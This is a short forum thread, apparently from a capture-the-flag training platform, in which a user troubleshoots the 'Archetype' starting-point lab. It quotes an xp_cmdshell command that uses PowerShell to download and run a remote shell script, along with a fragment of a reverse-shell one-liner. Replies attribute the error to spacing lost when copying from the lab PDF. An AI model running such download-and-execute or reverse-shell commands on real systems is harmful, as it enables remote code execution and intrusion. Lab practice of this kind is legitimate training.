Starting Point Archetype Error: The ampersand (&) character is not allowed

Hey,

Trying to do the archetype starting point challenge but I end up getting the following error whilst doing the command:
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.12/shell.ps1\");"

Error:

IEX : At line:1 char:275

  • ... .ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex$data2>&1|Out-St ...

The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double

quotation marks ("&") to pass it as part of a string.

Does anyone know a fix? Followed the instructions as in the PDF. I tried doing it with quatation marks around it but still end up with errors.

Comments

  • edited April 12

    //Fixed

    Solution: Do not copy straight from the PDF and recheck every space if you do decide to copy the shell code.

  • @Inspect said:

    //Fixed

    Solution: Do not copy straight from the PDF and recheck every space if you do decide to copy the shell code.

    Do you mind posting an actual fix, because I see this as a technical problem, not a spoiler.

  • Yea i bumped in to it and what @Inspect means is that the script that is in the PDF it doesnt have spaces i found a github account that has the same onliner for the powershell netcat script:

    https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

    happy hacking

Sign In to comment.